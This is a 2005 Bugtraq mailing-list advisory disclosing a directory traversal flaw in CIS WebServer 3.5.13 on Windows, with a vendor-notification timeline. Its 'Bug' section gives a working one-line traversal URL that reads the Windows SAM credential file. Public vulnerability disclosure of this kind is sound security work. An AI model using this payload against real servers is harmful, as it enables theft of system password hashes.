CIS WebServer Directory Traversal Bug

To: "bugtraq" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: CIS WebServer Directory Traversal Bug
From: "CorryL" <corryl@xxxxxxxxxxxxx>
Date: Fri, 25 Feb 2005 18:31:34 +0100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

-=[ x0n3-h4ck Italian Security Team ]=-

/*Advisories*\

/*

Application: CIS WebServer

Vendor's Url: www.cisindia.net

Version: 3.5.13

Platforms: Windows

Bug: Directory Traversal

Exploitation: Remote

Author: CorryL

corryl80@xxxxxxxxx

www.x0n3-h4ck.org

*\



{Description}

CIS WebServer is an easy http server, A remote user can obtain files on the
system that are located outside of
the web document directory.


{Bug}

http://victimhost/../../../windows/repair/sam

A remote user succeds to read the file sam of the system where CIS WebServer
is running



{Vendor Status}

20/02/2005 Vendor notification

21/02/2005 Vendor Response

25/02/2005 No patch relase from vendor

25/02/2005 Public disclousure

{Fix}

Waiting for an official patch









_________________________________
www.seekstat.it is your web stat

Prev by Date: RE: Firescrolling [Firefox 1.0]
Next by Date: Re: iDEFENSE Security Advisory 02.25.05: WU-FTPD File Globbing Denial of Service Vulnerability
Previous by thread: Re: iDEFENSE Security Advisory 02.25.05: WU-FTPD File Globbing Denial of Service Vulnerability
Next by thread: -==phpBB 2.0.12 Full path disclosure==-
Index(es):
- Date
- Thread